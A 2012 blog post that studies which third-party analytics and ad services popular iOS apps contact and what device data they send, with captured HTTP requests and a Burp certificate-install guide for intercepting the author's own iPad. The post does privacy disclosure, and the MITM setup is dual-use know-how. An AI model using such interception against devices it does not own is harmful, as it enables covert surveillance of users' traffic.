ceriksen.com | Page 4

July 16, 2012 by Charlie Eriksen

Overview of iOS tracking traffic

Introduction
When I started reviewing a few iOS applications for privacy concerns, such as the SpringPad application which used your email addresses without permission, I noticed that many applications would contact third-party sites with information about your device, often including a unique identifier. At the time I didn’t have much data to back it up. But I decided to undertake a small project to study this more in depth. Here was my game plan:

Download top 6 applications in each category on the App Store
Launch each application, click few to no buttons at all, and close down the application
Analyze the requests made by the application
Note down all requests that somehow appears to have information enough to track your device
Study the results

With this in mind, I went to work. It was quite a boring task, since I did it all manually. But quite quickly I noticed some trends. And this is what I want to share with everybody, since I couldn’t find any previous research done like this.

The tl;dr
Here are some very quick stats:

I downloaded apps from 22 categories
I downloaded and executed a total of 115 applications
They contacted 128 different servers and sent data about your device
Each application contacted between 0 and 10 servers with data about your device
85 of the servers were contacted over HTTP (67%)
42 of the servers were contacted over HTTPS (33%)
The applications that tracks you the most is USA TODAY, which communications information about you to 10 servers
The most used service is used by 29 applications (25%) of the ones tested, second most used was observed from 11 applications (9.5%)

Here are the requests contained about your device:

Unique identifier
Mac Address
Local IP address
GPS Coordinates
Time zone/location
Device type
Device version
OS type
OS version
OS locale
Application identifier
Application version
Screen resolution and orientation
Radio type (Wifi or 3G)

Methodology
My method for collecting this data involved using the proxy and target mapping function of Burp Pro. By installing a MITM certificate on my iPad, I can intercept most, if not all, of the traffic going out of the device over HTTP(S). I analyzed each request, and determined whether or not this request would track your device in any way, and added it to my Maltego document. I then saved the requests, cleared out Burp and went onto the next application.

The applications are the top 6 applications of each category from the iOS application store. I used the American app store for this, since it presumably has the biggest sample of users, and thus the top 6 applications would with the most likelihood be of interest to the most users. The applications had not been launched from the device before, so there were a lot of “first startup” requests observed.

The setup used can be replicated with the free version of the excellent tool Burp. Here are the steps I used:

Start up burp
Configure a browser (Example here being Firefox) to proxy through Burp, by default localhost on port 8080
Go to a HTTPS site through the configured browser, which should give you a SSL warning
Click “Add Exception”
Click “View”
Go to the “Details” tab
Click on the “PortSwigger CA” tree item in the Certificate Hierarchy
Click export
Save it as burp.cer
Using a command line, browse to where you saved the certificate.
Run python.exe -m SimpleHTTPServer
Now pick up your iDevice and browse to port 8000 on the machine used to extract the cert
You’ll now get a directory listing, pick out the cert you exported and download it
Now you’ll be taken to your System preferences, and can install the certificate. Job done

The big pictures

Breakdown by provider top 7 (Technical!)
http://data.flurry.com
Flurry comes in at the top of our list, with a total of 29 applications in our sample which uses this. Their site claims that (more than 190.000 applications use it)[http://www.flurry.com/product/analytics/index.html]. It makes a lot of requests with a lot of data. For instance, it appears to be making a request at both startup and shutdown of an application. And there’s a lot of seemingly random information. This traffic takes place over plain HTTP without SSL.

POST /aas.do HTTP/1.1
Host: data.flurry.com
User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 925
Content-Type: application/octet-stream
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

N8…›”j38XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•&gt;-ß"›Óì.2‹&gt;ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”
scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,11.0.68…›&”mLen_US
US/PacificÿÿEndCSRStartCSRStartCSRtstbcktflrypkg¤Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl|||/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnoÚEndCSRtstbcktflrypkg¥Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnol¯

POST /aas.do HTTP/1.1

Host: data.flurry.com

User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 925

Content-Type: application/octet-stream

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

N8…›”j38XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•>-ß"›Óì.2‹>ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”

scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,11.0.68…›&”mLen_US

US/PacificÿÿEndCSRStartCSRStartCSRtstbcktflrypkg¤Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl|||/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnoÚEndCSRtstbcktflrypkg¥Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnol¯

POST /aas.do HTTP/1.1
Host: data.flurry.com
User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 2054
Content-Type: application/octet-stream
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

N8…œ1¨38XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•&gt;-ß"›Óì.2‹&gt;ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”
scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,11.0.68…›&”
ä;en_US
US/Pacificuser10532163ÿÿStartCSR
LoadingScr UserLoginHeyYouEndCSRStartCSRtstbcktflrypkg¤Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl|||/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnoÚEndCSRtstbcktflrypkg¥Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnol¯ UserLogintstbcktflrypkgyVer||1.0.6:636|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultbaiduser10532163EndCSRtstbcktflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinyesÞ¤HeyYoutstbcktflrypkgVer||1.0.6:636brnchDefaultåC
LoadingScrfrmFrontendtsttme4585.176lgdinyesflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0bckttoRacebrnchDefaultøAEndCSRtstbcktflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinyes

ö·Ü

POST /aas.do HTTP/1.1

Host: data.flurry.com

User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 2054

Content-Type: application/octet-stream

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

N8…œ1¨38XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•>-ß"›Óì.2‹>ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”

scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,11.0.68…›&”

ä;en_US

US/Pacificuser10532163ÿÿStartCSR

LoadingScr UserLoginHeyYouEndCSRStartCSRtstbcktflrypkg¤Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl|||/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnoÚEndCSRtstbcktflrypkg¥Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnol¯ UserLogintstbcktflrypkgyVer||1.0.6:636|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultbaiduser10532163EndCSRtstbcktflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinyesÞ¤HeyYoutstbcktflrypkgVer||1.0.6:636brnchDefaultåC

LoadingScrfrmFrontendtsttme4585.176lgdinyesflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0bckttoRacebrnchDefaultøAEndCSRtstbcktflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinyes

ö·Ü

POST /aas.do HTTP/1.1
Host: data.flurry.com
User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 307
Content-Type: application/octet-stream
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

N8…›&Í38XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•&gt;-ß"›Óì.2‹&gt;ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”
scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,18r‘x

POST /aas.do HTTP/1.1

Host: data.flurry.com

User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 307

Content-Type: application/octet-stream

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

N8…›&Í38XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•>-ß"›Óì.2‹>ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”

scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,18r‘x

POST /aas.do HTTP/1.1
Host: data.flurry.com
User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0
Content-Length: 1410
Content-Type: application/octet-stream
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

N8…œ738XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•&gt;-ß"›Óì.2‹&gt;ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”
scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,11.0.68…›&”ßFáen_US
US/Pacificuser10532163ÿÿEndCSR  UserLoginStartCSRStartCSRtstbcktflrypkg¤Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl|||/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnoÚEndCSRtstbcktflrypkg¥Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnol¯ UserLogintstbcktflrypkgyVer||1.0.6:636|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultbaiduser10532163EndCSRtstbcktflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinyesÞ¤Û

POST /aas.do HTTP/1.1

Host: data.flurry.com

User-Agent: csr4c3/1.0.6 CFNetwork/548.1.4 Darwin/11.0.0

Content-Length: 1410

Content-Type: application/octet-stream

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Pragma: no-cache

Connection: keep-alive

Proxy-Connection: keep-alive

N8…œ738XEJT2XRT2I9H9BFB291.0.6.IPHONEde5381e09b10d93043b50f43153f3aeeb4dcc589Pq…·j³î•>-ß"›Óì.2‹>ŽJWÖ"º9†zÍF»{»¾~7p|&ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B8…›&”8…›&”

scr.height1024 scr.width768device.os.version5.1.1device.model.1iPad1,11.0.68…›&”ßFáen_US

US/Pacificuser10532163ÿÿEndCSR UserLoginStartCSRStartCSRtstbcktflrypkg¤Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl|||/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnoÚEndCSRtstbcktflrypkg¥Ver||Notavailable|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||0|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinnol¯ UserLogintstbcktflrypkgyVer||1.0.6:636|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultbaiduser10532163EndCSRtstbcktflrypkg¢Ver||1.0.6:636|/|BCsh||0|/|BGld||0|/|BXp||0|/|Bfuel||10|/|MlstRce|||/|PLvl||1|/|CmlCr||1|/|CmlSns||1|/|CmlUpg||0|/|CmlRCmp||0|/|CmlMchR||0|/|CmlCsh||0|/|CmlGld||0brnchDefaultlgdinyesÞ¤Û

There are a few trends that we can see.

A unique identifier is sent across, 38XEJT2XRT2I9H9BFB29. This is seemingly unique to the application
The version number of the application, in this case 1.0.6
A unique identifier of the device, de5381e09b10d93043b50f43153f3aeeb4dcc589
Another seemingly unique value to the device, ID1BDCEF03-F55E-439D-BA2A-C0AAC6B7BF6B
Screen height, width, OS version, device model, locale, time zone
Followed by what seems like some application-specific information

ScoreCardResearch

This request looks, much like Flurry, to be tracking of the device and events taking place from the application, such as startup. It sends this content over plain HTTP, and was used by 11 of the tested applications.

GET /p?&name=start&c2=6035223&c1=19&c4=USA%20TODAY&c10=ios&c12=12D21EF36F1E020648ED07C722E496B6&ns_ap_device=iPad1%252C1&ns_ap_as=1342280958463&ns_type=view&ns_ts=1342280958579&c3=start&ns_ap_lang=en_US&ns_ap_event=start&ns_ap_ver=2.0.9&ns_ap_usage=116&ns_ap_res=768x1024&ns_ap_install=yes&ns_ap_pfv=5.1.1 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: USA%20TODAY/2.0.9 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /p?&name=start&c2=6035223&c1=19&c4=USA%20TODAY&c10=ios&c12=12D21EF36F1E020648ED07C722E496B6&ns_ap_device=iPad1%252C1&ns_ap_as=1342280958463&ns_type=view&ns_ts=1342280958579&c3=start&ns_ap_lang=en_US&ns_ap_event=start&ns_ap_ver=2.0.9&ns_ap_usage=116&ns_ap_res=768x1024&ns_ap_install=yes&ns_ap_pfv=5.1.1 HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: USA%20TODAY/2.0.9 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /p?&ns_ts=1342279490427&c1=19&c2=6036333&ns_type=view&ns_ap_event=start&c3=start&c12=FDE697D1CBEE517CFDC39A9A2D4B4ECD-m&ns_ap_as=1342279490346&c4=Pandora&ns_radio=wifi&ns_ap_pfv=5.1.1&ns_ap_runs=0&ns_ap_install=yes&ns_ap_res=768x1024&ns_ap_usage=81&ns_ap_ver=3.2.1&ns_ap_lang=en_US&ns_ap_device=iPad1%252C1&c10=ios&name=start HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Pandora/3.2.1 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /p?&ns_ts=1342279490427&c1=19&c2=6036333&ns_type=view&ns_ap_event=start&c3=start&c12=FDE697D1CBEE517CFDC39A9A2D4B4ECD-m&ns_ap_as=1342279490346&c4=Pandora&ns_radio=wifi&ns_ap_pfv=5.1.1&ns_ap_runs=0&ns_ap_install=yes&ns_ap_res=768x1024&ns_ap_usage=81&ns_ap_ver=3.2.1&ns_ap_lang=en_US&ns_ap_device=iPad1%252C1&c10=ios&name=start HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: Pandora/3.2.1 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /p?&name=start&c2=6035140&c1=19&c4=disneyplayer&c10=ios&c12=35613F62C5057B3055664FC49FEDED7F&ns_ap_device=iPad1%252C1&ns_ap_as=1342269657913&ns_type=view&ns_ts=1342269657999&c3=start&ns_ap_lang=en_US&ns_ap_event=start&ns_ap_ver=2.0.0&ns_ap_usage=87&ns_ap_res=768x1024&ns_ap_install=yes&ns_ap_pfv=5.1.1 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: disneyplayer/2.0.0 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /p?&name=start&c2=6035140&c1=19&c4=disneyplayer&c10=ios&c12=35613F62C5057B3055664FC49FEDED7F&ns_ap_device=iPad1%252C1&ns_ap_as=1342269657913&ns_type=view&ns_ts=1342269657999&c3=start&ns_ap_lang=en_US&ns_ap_event=start&ns_ap_ver=2.0.0&ns_ap_usage=87&ns_ap_res=768x1024&ns_ap_install=yes&ns_ap_pfv=5.1.1 HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: disneyplayer/2.0.0 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /p?&ns_ts=1342269411301&c1=19&c2=3005420&ns_type=view&ns_ap_event=start&c3=start&c12=5964C8425C86D98C2D6BC319B6266EBC&ns_ap_as=1342269411255&c4=KidsPlayer&ns_radio=wifi&ns_ap_pfv=5.1.1&ns_ap_runs=0&ns_ap_install=yes&ns_ap_res=768x1024&ns_ap_usage=46&ns_ap_ver=2.0.3&ns_ap_lang=en_US&ns_ap_device=iPad1%252C1&c10=ios&name=start HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: KidsPlayer/2.0.3 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /p?&ns_ts=1342269411301&c1=19&c2=3005420&ns_type=view&ns_ap_event=start&c3=start&c12=5964C8425C86D98C2D6BC319B6266EBC&ns_ap_as=1342269411255&c4=KidsPlayer&ns_radio=wifi&ns_ap_pfv=5.1.1&ns_ap_runs=0&ns_ap_install=yes&ns_ap_res=768x1024&ns_ap_usage=46&ns_ap_ver=2.0.3&ns_ap_lang=en_US&ns_ap_device=iPad1%252C1&c10=ios&name=start HTTP/1.1

Host: b.scorecardresearch.com

User-Agent: KidsPlayer/2.0.3 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

Between these 4 requests, we see a number of information being transmitted:

The resolution of the device
Device type, version and locale
Application version
The connectivity of the device (Wifi or 3G)
Number of times the application has been started
Name of the application
The event that triggered the request (Such as starting up)

Admob
Admob is a Google service, which is used to track downloads of an application. It does so by making requests with a MD5 hash of the unique identifier of the device, and the application ID. It communicates exclusively over HTTP, and was used by 9 applications tested.

GET /f0?isu=22077B8D568BC2B9964D9E7543C3E71E&md5=1&app_id=418987775 HTTP/1.1
Host: a.admob.com
User-Agent: TuneIn%20Radio/2.7 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /f0?isu=22077B8D568BC2B9964D9E7543C3E71E&md5=1&app_id=418987775 HTTP/1.1

Host: a.admob.com

User-Agent: TuneIn%20Radio/2.7 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

This is done by this piece of code that Google provides.

// This method requires adding #import <CommonCrypto/CommonDigest.h> to your source file.
- (NSString *)hashedISU {
  NSString *result = nil;
  NSString *isu = [UIDevice currentDevice].uniqueIdentifier;

  if(isu) {
    unsigned char digest[16];
    NSData *data = [isu dataUsingEncoding:NSASCIIStringEncoding];
    CC_MD5([data bytes], [data length], digest);

    result = [NSString stringWithFormat: @"%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
           digest[0], digest[1], 
           digest[2], digest[3],
           digest[4], digest[5],
           digest[6], digest[7],
           digest[8], digest[9],
           digest[10], digest[11],
           digest[12], digest[13],
           digest[14], digest[15]];
    result = [result uppercaseString];
  }
  return result;
}

- (void)reportAppOpenToAdMob {
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init]; // we're in a new thread here, so we need our own autorelease pool
  // Have we already reported an app open?
  NSString *documentsDirectory = [NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,
                                  NSUserDomainMask, YES) objectAtIndex:0];
  NSString *appOpenPath = [documentsDirectory stringByAppendingPathComponent:@"admob_app_open"];
  NSFileManager *fileManager = [NSFileManager defaultManager];
  if(![fileManager fileExistsAtPath:appOpenPath]) {
    // Not yet reported -- report now
    NSString *appOpenEndpoint = [NSString stringWithFormat:@"http://a.admob.com/f0?isu=%@&md5=1&app_id=%@",
                                 [self hashedISU], @""];
    NSURLRequest *request = [NSURLRequest requestWithURL:[NSURL URLWithString:appOpenEndpoint]];
    NSURLResponse *response;
    NSError *error = nil;
    NSData *responseData = [NSURLConnection sendSynchronousRequest:request returningResponse:&response error:&error];
    if((!error) && ([(NSHTTPURLResponse *)response statusCode] == 200) && ([responseData length] &gt; 0)) {
      [fileManager createFileAtPath:appOpenPath contents:nil attributes:nil]; // successful report, mark it as such
      NSLog(@"App download successfully reported.");
    } else {
      NSLog(@"WARNING: App download not successfully reported. %@", [NSString stringWithData:responseData encoding:NSUTF8StringEncoding]);
    }
  }
  [pool release];
}

// This method requires adding #import <CommonCrypto/CommonDigest.h> to your source file.

- (NSString *)hashedISU {

NSString *result = nil;

NSString *isu = [UIDevice currentDevice].uniqueIdentifier;

if(isu) {

unsigned char digest[16];

NSData *data = [isu dataUsingEncoding:NSASCIIStringEncoding];

CC_MD5([data bytes], [data length], digest);

result = [NSString stringWithFormat: @"%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",

digest[0], digest[1],

digest[2], digest[3],

digest[4], digest[5],

digest[6], digest[7],

digest[8], digest[9],

digest[10], digest[11],

digest[12], digest[13],

digest[14], digest[15]];

result = [result uppercaseString];

}

return result;

}

- (void)reportAppOpenToAdMob {

NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init]; // we're in a new thread here, so we need our own autorelease pool

// Have we already reported an app open?

NSString *documentsDirectory = [NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,

NSUserDomainMask, YES) objectAtIndex:0];

NSString *appOpenPath = [documentsDirectory stringByAppendingPathComponent:@"admob_app_open"];

NSFileManager *fileManager = [NSFileManager defaultManager];

if(![fileManager fileExistsAtPath:appOpenPath]) {

// Not yet reported -- report now

NSString *appOpenEndpoint = [NSString stringWithFormat:@"http://a.admob.com/f0?isu=%@&md5=1&app_id=%@",

[self hashedISU], @""];

NSURLRequest *request = [NSURLRequest requestWithURL:[NSURL URLWithString:appOpenEndpoint]];

NSURLResponse *response;

NSError *error = nil;

NSData *responseData = [NSURLConnection sendSynchronousRequest:request returningResponse:&response error:&error];

if((!error) && ([(NSHTTPURLResponse *)response statusCode] == 200) && ([responseData length] > 0)) {

[fileManager createFileAtPath:appOpenPath contents:nil attributes:nil]; // successful report, mark it as such

NSLog(@"App download successfully reported.");

} else {

NSLog(@"WARNING: App download not successfully reported. %@", [NSString stringWithData:responseData encoding:NSUTF8StringEncoding]);

}

[pool release];

}

Tapjoy
Tapjoy is another run of the mill marketing network that has had a bit of a past. It appears to be also tied to a virtual currency, which can be obtained and used in applications using this service. It tracks the user on the application startup like most other services. The interesting thing to notice here is that one application is communicating with it across HTTP, while five are doing so over HTTPS.

GET /Connect?country_code=US&language_code=en&lad=0&app_version=1.1.2&os_version=5.1.1&device_type=iPad&app_id=d3680541-8f43-4067-b631-a16fc78bf1ac&library_version=7.2.0&udid=de5381e09b10d93043b50f43153f3aeeb4dcc589&device_name=iPad1,1 HTTP/1.1
Host: ws.tapjoyads.com
User-Agent: DoodleBuddy/1.1.2 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

GET /Connect?country_code=US&language_code=en&lad=0&app_version=1.1.2&os_version=5.1.1&device_type=iPad&app_id=d3680541-8f43-4067-b631-a16fc78bf1ac&library_version=7.2.0&udid=de5381e09b10d93043b50f43153f3aeeb4dcc589&device_name=iPad1,1 HTTP/1.1

Host: ws.tapjoyads.com

User-Agent: DoodleBuddy/1.1.2 CFNetwork/548.1.4 Darwin/11.0.0

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: keep-alive

Proxy-Connection: keep-alive

GET /connect?country_code=US&device_type=iPad&app_id=f36e2903-2dde-4864-bb50-5c95f4b8de48&plugin=native&os_version=5.1.1&library_version=8.1.8&language_code=en&lad=0&timestamp=1342284068&sdk_type=connect&platform=iOS&mac_address=d8306270d8f7&display_multiplier=1.000000&app_version=4.0.1&verifier=23819c8dfaeac7ace55cc829e745d28da04d85443cea20e789799dbe1af50964 HTTP/1.1
Host: ws.tapjoyads.com
User-Agent: Bible/4.0.1 CFNetwork/548.1.4 Darwin/11.0.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

